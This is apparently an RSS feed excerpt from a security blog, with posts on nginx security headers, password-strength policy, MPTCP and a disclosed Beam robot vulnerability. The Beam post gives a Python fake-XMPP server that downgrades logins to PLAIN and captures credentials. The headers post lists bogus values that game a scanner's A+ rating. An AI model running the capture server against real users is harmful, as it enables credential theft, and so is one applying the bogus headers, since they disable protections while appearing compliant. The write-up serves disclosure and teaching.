<h2 id="addinghstsandcsptothemix">Adding HSTS and CSP to the mix</h2>
<p>If you deploy an over-aggressive CSP policy, browsers might disallow resources from being loaded and your website will break. If you deploy an HSTS policy and at a later time disable HTTPS on your website/application, users will temporarily be disallowed access to your website.</p>
<h3 id="hsts">HSTS</h3>
<p>Since I&apos;m always going to run my website over TLS, I&apos;m enabling HSTS with a <a href="https://developer.mozilla.org/en-US/docs/Web/Security/HTTP_strict_transport_security?ref=blog.diogomonica.com"><em>max-age</em></a> parameter of 7776000 (seconds). This will tell browsers that, for the next three months, they should only attempt accessing diogomonica.com over HTTPS:</p>
<pre><code class="language-bash">add_header Strict-Transport-Security max-age=7776000;
</code></pre>
<p>Another important HSTS parameter is <em>includeSubDomains</em>, which I&apos;m leaving disabled, since it&apos;s common for me to run non-https demo sites under *.diogomonica.com. You should enable it if you&apos;re sure every single sub-domain will always be using HTTPS.</p>
<h3 id="csp">CSP</h3>
<p>CSP has two different modes of operation: enforce and report. If you use the <em>Content-Security-Policy</em> header, CSP will operate in enforce mode; if you use <em>Content-Security-Policy-Report-Only</em> it will operate in report mode.</p>
<p>CSP is pretty complex, and I recommend enabling it in report mode first, since it will allow you to understand the changes you need to make to enable enforcement later on. You should also read about the different <a href="https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives?ref=blog.diogomonica.com">CSP policy directives</a>.</p>
<p>In my particular case, since no one will ever complain about my blog being broken, I jumped straight to enforce mode and, with the help of the Chrome Developer console, fixed the red-warnings one by one, resulting in this final policy:</p>
<pre><code class="language-bash">add_header Content-Security-Policy &quot;default-src &apos;self&apos;; 
script-src &apos;self&apos; &apos;unsafe-eval&apos; https://ssl.google-analytics.com https://ajax.cloudflare.com; 
img-src &apos;self&apos; https://ssl.google-analytics.com ; 
style-src &apos;self&apos; &apos;unsafe-inline&apos; https://fonts.googleapis.com; 
font-src &apos;self&apos; https://fonts.googleapis.com https://fonts.gstatic.com; 
object-src &apos;none&apos;&quot;;
</code></pre>
<p>This is the current rating on <a href="https://securityheaders.io/?ref=blog.diogomonica.com">securityheaders.io</a>, after restarting my nginx server:</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/all_green_but_one.png" alt loading="lazy"></p>
<h3 id="gettingtoaenablinghpkp">Getting to A+ (enabling HPKP)</h3>
<p>HPKP works by having the browser look up the HPKP pins and check whether any of them match any of the <a href="https://raymii.org/s/articles/HTTP_Public_Key_Pinning_Extension_HPKP.html?ref=blog.diogomonica.com">SPKI fingerprints</a> in the certificate chain. This means that you can use a pin from anywhere in the chain: from a leaf certificate all the way up to the root certificate.</p>
<p>Since the <a href="https://tools.ietf.org/html/rfc7469?ref=blog.diogomonica.com">RFC</a> states that you need to provide at least two pins, I created a new public/private key pair and stored it offline. After that, I got the SPKI fingerprint for both my keys. There are a <a href="https://developer.mozilla.org/en-US/docs/Web/Security/Public_Key_Pinning?ref=blog.diogomonica.com">few different ways</a> to do it.</p>
<p>I got the fingerprint from my current certificate using the following openssl command:</p>
<pre><code class="language-bash">root@burly:/etc/ssl# openssl x509 -in cloudflare-diogomonica.com.crt -pubkey -noout | openssl rsa -pubin -outform der | openssl dgst -sha256 -binary | base64
bDk6Wbfj83EpcaKgT5WkBfiiml66Tln3DskDJneGBoo=
</code></pre>
<p>HPKP is probably the most dangerous of all the security headers. Like HSTS, if something goes wrong (your private key gets compromised), users might be disallowed from accessing your website for the duration you specify in your <em>max_age</em> argument. Also, like CSP, HPKP actually comes with a <em>Report-Only</em> version, which allows you to test your pins, without risking downtime. I recommend this <a href="https://timtaubert.de/blog/2014/10/http-public-key-pinning-explained/?ref=blog.diogomonica.com">great blog post</a> by Tim Taubert for more info on HPKP.</p>
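<p>A report-only HPKP deployment would look something like the following; the pins are the same two used in the enforcing header below, and the report endpoint is a placeholder you would replace with your own:</p>
<pre><code class="language-bash">add_header Public-Key-Pins-Report-Only &apos;pin-sha256=&quot;bDk6Wbfj83EpcaKgT5WkBfiiml66Tln3DskDJneGBoo=&quot;; pin-sha256=&quot;E8WztKzM3elUxkcjR2S5P4hhyBNf6lHkmjAHKhpGWooE=&quot;; max-age=60; report-uri=&quot;https://report-uri.io/...&quot;&apos;;
</code></pre>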
<p>As I mentioned before, the lack of readership of this blog allows me to jump right into enforcement mode, adding this new header to my nginx config:</p>
<pre><code class="language-bash">add_header Public-Key-Pins &apos;pin-sha256=&quot;bDk6Wbfj83EpcaKgT5WkBfiiml66Tln3DskDJneGBoo=&quot;; pin-sha256=&quot;E8WztKzM3elUxkcjR2S5P4hhyBNf6lHkmjAHKhpGWooE=&quot;; max-age=60&apos;;
</code></pre>
<p>I will point out that, even though I was being cavalier, I did set a <em>max_age</em> of 60 seconds for testing, allowing me to simply disable the header and wait a minute if I messed up the pins somehow.</p>
<p>If you want to reduce the risk of losing your keys or remove the need to deal with offline key-pairs, you can pin to a root CA. That will increase your attack surface, but it will also make it easier to get a new valid certificate later. I would recommend pinning to Let&apos;s Encrypt, but be sure to read <a href="https://community.letsencrypt.org/t/hpkp-best-practices-if-you-choose-to-implement/4625?ref=blog.diogomonica.com">this</a> before you do.</p>
<h2 id="justshowmethescreenshot">Just show me the screenshot!</h2>
<p>After restarting nginx with all of our new headers, voil&#xE0;, A+.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/securityheaders_a_plus.png" alt loading="lazy"></p>
<h2 id="thissoundslikealotofworkcanicheatmywaytoa">This sounds like a lot of work, can I cheat my way to A+?</h2>
<p>Since <a href="https://securityheaders.io/?ref=blog.diogomonica.com">securityheaders.io</a> is only checking for the presence of the header (it doesn&apos;t even attempt to parse parameters), the answer is yes:</p>
<pre><code class="language-bash">add_header Strict-Transport-Security max-age=0;
add_header X-Frame-Options &quot;ANYTHINGREALLY&quot;;
add_header X-Content-Type-Options anythingreally;
add_header X-XSS-Protection &quot;0&quot;;
add_header Content-Security-Policy &quot;default-src *&quot;;
add_header Public-Key-Pins max-age=0;
</code></pre>
<h2 id="whataboutgettinganaonssllabs">What about getting an A+ on SSL Labs?</h2>
<p>If you&apos;re ok with an A, use <a href="https://cloudflare.com/?ref=blog.diogomonica.com">cloudflare</a>. If you really want that A+, you can follow <a href="https://sethvargo.com/getting-an-a-plus-on-qualys-ssl-labs-tester/?ref=blog.diogomonica.com">this post</a>. <strong>Edit</strong>: @asaaki pointed out that you can also get an A+ on Cloudflare, as long as you have HSTS set to 180+ days.</p>
<h2 id="conclusion">Conclusion</h2>
<p>With the exception of HPKP, which I wouldn&apos;t really recommend enabling unless you have a very mature SecOps team, all of these headers should be enabled on any production website you deploy.</p>
<p>Remember: it will be a lot easier to iterate on configuration changes if you&apos;re not currently serving any traffic, so do it sooner rather than later. :)</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Password Security: Why the horse battery staple is not correct]]></title><description><![CDATA[Why the horse battery staple is not correct: We should **not** be incentivizing people to choose passwords in the first place.]]></description><link>https://blog.diogomonica.com/2014/10/11/password-security-why-the-horse-battery-staple-is-not-correct/</link><guid isPermaLink="false">62d8ce7b47f91800018f06c8</guid><category><![CDATA[passwords]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sat, 11 Oct 2014 21:09:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>I&#x2019;ve intentionally kept myself from commenting on Password Security in the wake of the last month&#x2019;s mass iCloud account compromise. My feeling was that this topic had already been discussed to exhaustion, and there really was nothing new about the problem that was worth discussing.</p>
<p>However, as I read through the dozens of articles on <a href="http://www.independent.co.uk/life-style/gadgets-and-tech/is-apples-icloud-safe-how-to-create-a-stronger-password-and-turn-on-twostep-verification-9703485.html?ref=blog.diogomonica.com" title="How to choose a stronger password">how to choose a strong password</a>, I realized that the majority of them are focused on trying to solve the wrong problem.</p>
<p>We should <strong>not</strong> be incentivizing people to choose passwords in the first place.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/xkcd_comic.png" alt loading="lazy"></p>
<p>There are obviously a few situations where memorable passwords are a requirement, but if you write an <a href="http://www.vice.com/read/your-password-is-not-secure-and-its-not-your-fault-102?ref=blog.diogomonica.com" title="Vice your password is not secure">article</a> about choosing passwords where password managers aren&apos;t mentioned even once, you&apos;re not helping anyone.</p>
<p>In this post I&#x2019;m going to make the following arguments:</p>
<ul>
<li>Choosing a password should be something you do very infrequently.</li>
<li>Our focus should be on protecting passwords against informed statistical attacks and not brute-force attacks.</li>
<li>When you do have to choose a password, one of the most important selection criteria should be how many other people have also chosen that same password.</li>
<li>One of the most impactful things that we can do as a security community is to change password strength meters and disallow the use of common passwords.</li>
</ul>
<h2 id="usersshouldnotbechoosingpasswords">Users should not be choosing passwords</h2>
<p>Every time someone writes about the topic of passwords, the XKCD comic shown above makes an appearance.</p>
<p>The fact is that the number of passwords you actually need to memorize is pretty small, and there is no need to teach users how to choose good passwords. Everyone knows what a good password looks like; we just can&apos;t memorize a unique, strong password for every single online service out there.</p>
<p>With the advent of password managers, the large majority of all passwords should just be randomly generated, and replaced with a single password that provides access to all the others. This solves both the strength and memorability problems for 95% of your passwords<sup><a id="ffn1" href="#fn1" class="footnote">1</a></sup>.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/password_pie.png" alt loading="lazy"></p>
<p>The obvious exceptions to this rule are: the password manager&apos;s own vault key, laptop passwords, phone unlock codes, etc. Note, however, that this number of passwords is mostly static; it does not increase when you sign up for a new service.</p>
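<p>For everything outside those exceptions, generation is trivial. As a minimal sketch (the length and alphabet here are arbitrary choices, not recommendations), Python&apos;s standard library does it in a few lines:</p>
<pre><code class="language-python">import secrets
import string

# Uniformly random characters from a CSPRNG; no human patterns to exploit.
ALPHABET = string.ascii_letters + string.digits + string.punctuation

def generate_password(length: int = 24) -&gt; str:
    return &quot;&quot;.join(secrets.choice(ALPHABET) for _ in range(length))

print(generate_password())
</code></pre>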
<p>Even if we entertained the XKCD comic and started training users to select four random words instead of a complex single-word password, I argue that it would not amount to a significant increase in security.</p>
<p>People are not very creative and tend to think the same way when choosing passwords. This would lead to the exact same problem we have now, where a few passwords such as &quot;password123&quot; become very common. What is there to prevent &#x201C;letmeinfacebook&#x201D; from becoming the most common four-word password for Facebook accounts?<sup><a id="ffn2" href="#fn2" class="footnote">2</a></sup></p>
<h2 id="theattackermodeliswrong">The Attacker Model is wrong</h2>
<p>Brute-forcing passwords these days is hard. As a community we did a great job incentivizing the use of <a href="http://en.wikipedia.org/wiki/Bcrypt?ref=blog.diogomonica.com">bcrypt</a> and <a href="http://en.wikipedia.org/wiki/Scrypt?ref=blog.diogomonica.com">scrypt</a>, and humiliating those who use <a href="http://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/?ref=blog.diogomonica.com">bad password hashing mechanisms</a>.</p>
<p>Unless your attacker model includes state actors, you really don&#x2019;t have to be concerned about pure brute-force attacks. The most efficient attack against scrypt involves compromising your password hash and spending a lot of money on dedicated hardware to crack it offline, resources the large majority of attackers do not have access to.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/nsa_eagle.jpg" alt loading="lazy"></p>
<p>Without stealing the password hash, attackers are limited to trying username/password combinations over the internet, reducing the upper bound on the number of attempts per second by at least three orders of magnitude.</p>
<p>This means that we should stop blindly classifying password strength based on the number of bits of entropy<sup><a id="ffn3" href="#fn3" class="footnote">3</a></sup>, and should consider first and foremost how dictionary-attack resistant the password is.</p>
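<p>To put rough numbers on that gap, here is a back-of-the-envelope comparison; both rates are illustrative assumptions, not measurements:</p>
<pre><code class="language-python"># Back-of-the-envelope: offline cracking of a stolen scrypt hash on
# dedicated hardware vs. online guessing against a rate-limited endpoint.
OFFLINE_GUESSES_PER_SEC = 10_000  # assumed: well-funded attacker vs. scrypt
ONLINE_GUESSES_PER_SEC = 10       # assumed: network latency plus throttling

SECONDS_PER_DAY = 24 * 3600
for label, rate in ((&quot;offline&quot;, OFFLINE_GUESSES_PER_SEC),
                    (&quot;online&quot;, ONLINE_GUESSES_PER_SEC)):
    print(f&quot;{label}: ~{rate * SECONDS_PER_DAY:.1e} guesses/day&quot;)
</code></pre>
<p>At under a million guesses per day, an online attacker can exhaust a small dictionary of popular passwords but gets nowhere near a full brute-force keyspace, which is exactly why the ordering of the dictionary matters more than raw entropy.</p>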
<h2 id="abetterpasswordvalidationcriterion">A better password validation criterion</h2>
<p>Heuristic password-validation rules (e.g. minimum length, forced inclusion of alphanumeric characters) are largely ineffective and often counterproductive.</p>
<p>These heuristics inadvertently lead users to a handful of common solutions that are easy to remember while still obeying the requirements. Users typically circumvent the imposed pseudo-randomness with a few well-known tricks (&quot;p@ssw0rd&quot; being a typical example), which are then reused everywhere.</p>
<p>This leads to the repeated use of what are, in fact, very weak passwords, highly vulnerable to statistical guessing attacks (a dictionary-based attack ordered by decreasing probability of occurrence).</p>
<p>Coupled with the predominance of dictionary-based attacks and the leaks of large password data sets, this has led, in recent years, to the idea that the single most useful criterion for classifying the strength of a candidate password is the frequency with which it has appeared in the past.</p>
<table>
        <tbody><tr>
            <td>
                <img width="400" src="https://blog.diogomonica.com/content/images/2016/08/distribution1.png">
              </td>
            <td>       
                <img width="400" src="https://blog.diogomonica.com/content/images/2016/08/distribution2.png">
             </td>
        </tr>
    </tbody>
</table>
<p>This means that instead of a password strength meter, you should be ensuring that there is no skew in the distribution of passwords. If each password is guaranteed to be unique, the advantage of a statistical guessing attack is greatly reduced.</p>
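<p>As a toy illustration of the idea (a sketch only; real proposals, including some of those cited below, use probabilistic structures such as count-min sketches so that the popularity store itself can&apos;t be turned into a cracking dictionary):</p>
<pre><code class="language-python">from collections import Counter

MAX_POPULARITY = 3  # allow at most N accounts to share any one password

counts = Counter()  # hypothetical server-side popularity store

def allow_password(candidate: str) -&gt; bool:
    # Reject anything already picked too many times; keeping the
    # distribution flat blunts statistical guessing attacks.
    if counts[candidate] &gt;= MAX_POPULARITY:
        return False
    counts[candidate] += 1
    return True

assert allow_password(&quot;correct horse battery staple&quot;)
</code></pre>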
<p>There are <a href="https://www.usenix.org/conference/hotsec10/popularity-everything-new-approach-protecting-passwords-statistical-guessing?ref=blog.diogomonica.com">several</a> <a href="http://www.internetsociety.org/adaptive-password-strength-meters-markov-models?ref=blog.diogomonica.com">works</a> in the literature that propose such schemes, including one of <a href="https://github.com/diogomonica/diogomonica.com/blob/master/media/password-security-why-the-horse-battery-staple-is-not-correct/local_password_validation_with_soms_diogo_monica.pdf?ref=blog.diogomonica.com">my own</a> (PDF).</p>
<div style="text-align: center;">
<iframe src="//www.slideshare.net/slideshow/embed_code/38823827" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe>
</div>
<h2 id="whatweshoulddo">What we should do</h2>
<p>I think the first step is to stop propagating the idea that there is a way of choosing memorable passwords that will keep attackers at bay. This means no more &#x201C;How to choose your password&#x201D; blog posts.</p>
<p>The second step is to start using password strength forms to promote better password hygiene. I have seen a lot of <a href="http://www.badpasswords.org/?ref=blog.diogomonica.com">stupid password strength forms</a>, but I have never seen one that tells the user to generate and store the password in a password manager.</p>
<p>Finally, we should be evaluating the strength of passwords based on the frequency of appearance of those passwords, and not merely based on heuristics and misguided entropy calculations.</p>
<h2 id="ultimatelypasswordsshoulddie">Ultimately, Passwords should die</h2>
<p>As a longer-term strategy, we are moving toward killing the use of passwords as the single authentication mechanism and enforcing multi-factor authentication as the default everywhere.</p>
<p>For the time being, we should focus some of our efforts on providing passwords the basic life support they need.</p>
<h2 id="conclusion">Conclusion</h2>
<ul>
<li>Users don&#x2019;t need password memorization schemes; they need to be incentivized to use a good password manager.</li>
<li>For the few passwords they do need to memorize, you should focus on making them dictionary-attack resistant, not just strong from an information theory perspective.</li>
</ul>
<ol id="footnotes">
  <li id="fn1">Not derived from real data. <a href="#ffn1">&#x21A9;</a></li>
  <li id="fn2">If you analyze any of the large password leaks of the last few years you will notice that people tend to use the name of the service as part of their passwords. <a href="#ffn2">&#x21A9;</a></li>
  <li id="fn3">Obviously a decent minimum number of characters should still be enforced.<a href="#ffn3">&#x21A9;</a></li>
</ol>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[MPTCP: The path to multipath]]></title><description><![CDATA[I first heard about MultiPath TCP (MPTCP) in 2007 when I met Olivier Bonaventure in Louvain-la-Neuve, Belgium. In the meantime MPTCP has been gaining a ton of traction...]]></description><link>https://blog.diogomonica.com/2014/05/08/mptcp-the-path-to-multipath/</link><guid isPermaLink="false">62d8ce7b47f91800018f06c9</guid><category><![CDATA[mptcp]]></category><category><![CDATA[tcp]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Thu, 08 May 2014 21:28:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>I first heard about MultiPath TCP (MPTCP) in 2007 when I met <a href="http://perso.uclouvain.be/olivier.bonaventure/blog/html/index.html?ref=blog.diogomonica.com">Olivier Bonaventure</a> in Louvain-la-Neuve, Belgium.</p>
<p>In the meantime, MPTCP has been gaining a ton of traction, from Apple using it for Siri on <a href="http://www.networkworld.com/news/2013/091913-ios7-multipath-273995.html?ref=blog.diogomonica.com">iOS</a>, to large load-balancer vendors like F5 <a href="https://devcentral.f5.com/questions/is-mptcp-supported?ref=blog.diogomonica.com">supporting it</a>, and even large-scale media <a href="http://arstechnica.com/apple/2013/09/multipath-tcp-lets-siri-seamlessly-switch-between-wi-fi-and-3glte/?ref=blog.diogomonica.com">covering its advantages</a>.</p>
<p>If you want a primer on MPTCP you should check out the surprisingly readable <a href="http://tools.ietf.org/html/rfc6824?ref=blog.diogomonica.com">RFC</a>, or even <a href="http://queue.acm.org/detail.cfm?id=2591369&amp;ref=blog.diogomonica.com">this article</a> by Olivier Bonaventure. There is also a ton of information on the Linux Kernel MultiPath TCP project site, <a href="http://www.multipath-tcp.org/?ref=blog.diogomonica.com">multipath-tcp.org</a>.</p>
<p>Anyway, the point of this post is to share a security-oriented presentation that I did on MPTCP a while back. Enjoy.</p>
<h2 id="thepresentation">The presentation</h2>
<iframe src="https://www.slideshare.net/slideshow/embed_code/34457245" width="597" height="486" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px 1px 0; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> <!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Skynet (beta): The rise of the Beam robot]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_robot.jpg" alt loading="lazy"></p>
<p>At work we bought a few telepresence robots from <a href="https://suitabletech.com/?ref=blog.diogomonica.com">SuitableTech</a> called Beam. The Beam robots allow anyone from a remote location to have face-to-face interaction with the people at our HQ.</p>
<p>Each Beam robot boasts two wide-angle HD cameras, a 6-microphone array that cancels echo and reduces background noise, a</p>]]></description><link>https://blog.diogomonica.com/2013/11/03/skynet-beta-the-rise-of-the-beam-robot/</link><guid isPermaLink="false">62d8ce7b47f91800018f06ca</guid><category><![CDATA[beam]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sun, 03 Nov 2013 21:31:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_robot.jpg" alt loading="lazy"></p>
<p>At work we bought a few telepresence robots from <a href="https://suitabletech.com/?ref=blog.diogomonica.com">SuitableTech</a> called Beam. The Beam robots allow anyone from a remote location to have face-to-face interaction with the people at our HQ.</p>
<p>Each Beam robot boasts two wide-angle HD cameras, a 6-microphone array that cancels echo and reduces background noise, a 17&quot; screen, and a built-in speaker. It has a top speed of 3mph, and the battery lasts for 8 hours of active use.</p>
<p>The first thing I thought the first time I used one was how amazing the video and sound quality was. The second was, <ux class="highlight"><b>can I hack it?</b></ux></p>
<p><ux class="highlight">TL;DR:</ux> The beam client application didn&apos;t validate the remote server&apos;s certificate leading to the ability of an attacker stealing credentials by using a MITM attack. <a href="https://gist.github.com/diogomonica/a24a7285f31804d37144?ref=blog.diogomonica.com">Get the PoC code here</a>.</p>
<h2 id="theperfecttrojanhorse">The perfect trojan-horse</h2>
<p>What could be better than having an employee as an insider at a company? Having an insider robot, of course. Particularly one that has two HD cameras, a microphone array, and wheels to stroll around the office at 3am.</p>
<p>Each Beam is tied to an organization. To be able to control a Beam robot you have to use SuitableTech&apos;s client application and have been invited by the administrator of the organization. You also have to create an account at suitabletech.com and use those credentials to log in to the client app.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_diagram.png" alt loading="lazy"></p>
<h2 id="theclientapplication">The client application</h2>
<p>There were several different ways of trying to take control of the Beams. I started by trying to understand how the Beams were receiving commands from the client application. It turns out, I didn&apos;t really have to go any further than that.</p>
<p>This is what the client application looks like:</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_login.png" alt loading="lazy"></p>
<p>By providing correct credentials, you are then able to select one of the available Beam robots and start the remote-control session.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_control.png" alt loading="lazy"></p>
<p>Inspecting the network communication with Wireshark, it becomes obvious that the authentication is being done via a TLS-encrypted XMPP connection.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_tls_hello.png" alt loading="lazy"></p>
<p>The application communicates with two different remote servers: xmpp.suitabletech.com and suitabletech.com. Initially, several plain-text XMPP messages are exchanged, but then the client issues a STARTTLS command, and after the TLS negotiation all data is sent encrypted. This seems like a solid design.</p>
<p>I ran the Beam application directly from the command line and got some very useful debugging information. Of particular relevance was this warning line:</p>
<pre><code class="language-bash">WRN 17:36:28 talk/base/openssladapter.cc:867 Ignoring cert error while verifying cert chain
</code></pre>
<p>Ok, that seems bad. Let&apos;s see what Google has to tell me about where this error originates. I quickly find lines <b>851-855 of libjingle&apos;s openssladapter.cc</b>:</p>
<pre><code class="language-C">// Should only be used for debugging and development.
if (!ok &amp;&amp; stream-&gt;ignore_bad_cert()) {
  LOG(LS_WARNING) &lt;&lt; &quot;Ignoring cert error while verifying cert chain&quot;;
  ok = 1;
}
</code></pre>
<p>Wow. It seems that the Beam client application comes configured in debug mode by default and therefore <ux class="highlight"><b>ignores remote certificate validation</b></ux>. Neat.</p>
<p>With this in mind, I set out to understand how the XMPP protocol works and exactly what an XMPP client expects of the server. With a simple Java application that proxies every connection passing through it, printing out the messages from both the client and the servers, plus a little bit of DNS spoofing, I was able to see exactly what the Beam application and SuitableTech&#x2019;s servers were exchanging right up until the TLS tunnel is set up.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_message_exchange.png" alt loading="lazy"></p>
<p>It turns out that the XMPP protocol supports downgrading the authentication mechanism to plaintext, so I generated a new self-signed certificate for suitabletech.com and wrote a Python script that emulates the <a href="https://gist.github.com/diogomonica/a24a7285f31804d37144?ref=blog.diogomonica.com">server-side XMPP communication</a>, conveniently asking the client to authenticate via the PLAIN mechanism.</p>
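<p>Stripped to its essence, the fake server only has to speak enough XMPP to reach the SASL step while advertising PLAIN as the only mechanism. Below is a simplified sketch of that idea, not the actual PoC (see the gist linked above); the stream XML is abbreviated and the stanza parsing is deliberately naive:</p>
<pre><code class="language-python">import base64
import socket

# Where the DNS-spoofed client will connect, expecting xmpp.suitabletech.com
# (5222 is the standard XMPP client port).
HOST, PORT = &quot;0.0.0.0&quot;, 5222

STREAM = (&quot;&lt;?xml version=&apos;1.0&apos;?&gt;&quot;
          &quot;&lt;stream:stream from=&apos;suitabletech.com&apos; id=&apos;mitm&apos; version=&apos;1.0&apos; &quot;
          &quot;xmlns=&apos;jabber:client&apos; &quot;
          &quot;xmlns:stream=&apos;http://etherx.jabber.org/streams&apos;&gt;&quot;)
# Advertise PLAIN as the only SASL mechanism so the client downgrades.
FEATURES = (&quot;&lt;stream:features&gt;&quot;
            &quot;&lt;mechanisms xmlns=&apos;urn:ietf:params:xml:ns:xmpp-sasl&apos;&gt;&quot;
            &quot;&lt;mechanism&gt;PLAIN&lt;/mechanism&gt;&lt;/mechanisms&gt;&lt;/stream:features&gt;&quot;)

srv = socket.socket()
srv.bind((HOST, PORT))
srv.listen(1)
conn, _ = srv.accept()
conn.recv(4096)  # discard the client&apos;s opening &lt;stream:stream&gt;
conn.sendall((STREAM + FEATURES).encode())
auth = conn.recv(4096).decode()  # &lt;auth ... mechanism=&apos;PLAIN&apos;&gt;BASE64&lt;/auth&gt;
payload = auth.split(&quot;&gt;&quot;, 1)[1].split(&quot;&lt;&quot;, 1)[0]
# The SASL PLAIN payload is NUL-separated: authzid \0 authcid \0 password.
_, user, password = base64.b64decode(payload).split(b&quot;\x00&quot;)
print(&quot;captured:&quot;, user.decode(), password.decode())
conn.close()
</code></pre>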
<p>I guess it&apos;s time to <b>steal some passwords</b> :).</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_mitm_1.png" alt loading="lazy"></p>
<p>As expected, and as the warning message on the console suggested, the client blindly accepts any certificate, happily providing the user&#x2019;s plain-text credentials to our fake server.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/beam_mitm_2.png" alt loading="lazy"></p>
<h2 id="disclosuretimeline">Disclosure Timeline</h2>
<p>The team at SuitableTech seems to be really awesome, and they were super quick both to confirm the vulnerability and to patch it.</p>
<ul>
<li>
<p>June 16th: Vulnerability Discovered</p>
</li>
<li>
<p>June 18th: Initial Report finished</p>
</li>
<li>
<p>June 18th: Report sent to SuitableTech</p>
</li>
<li>
<p>June 18th: Vulnerability Confirmed by SuitableTech</p>
</li>
<li>
<p>June 20th: New version of the Beam app (1.17.1) is published and email gets sent out to all Beam admins to update.</p>
</li>
</ul>
<h2 id="conclusionsandfuturework">Conclusions and Future work</h2>
<p>I had a lot of fun playing with the Beams. It turned out that compromising credentials from the client application was surprisingly easy, allowing arbitrary Beam control to any attacker capable of mounting a MITM attack during login. In this particular case, the most damaging attack would be to cruise around the remote office and maybe steal a few secrets, but what if the Beams had <a href="https://www.youtube.com/watch?v=Q5BAnPeXYTI&amp;ref=blog.diogomonica.com">laser beams attached to their heads</a>?</p>
<p>I still intend to try attacking the Beams directly and see if I can get anything there, but as I mentioned before, the conceptual security model for the Beams seems to be pretty solid, and I doubt I&apos;m going to be able to find any other trivial issues like this.</p>
<p>This said, you never know ;).</p>
<!--kg-card-end: markdown-->]]></content:encoded></item></channel></rss>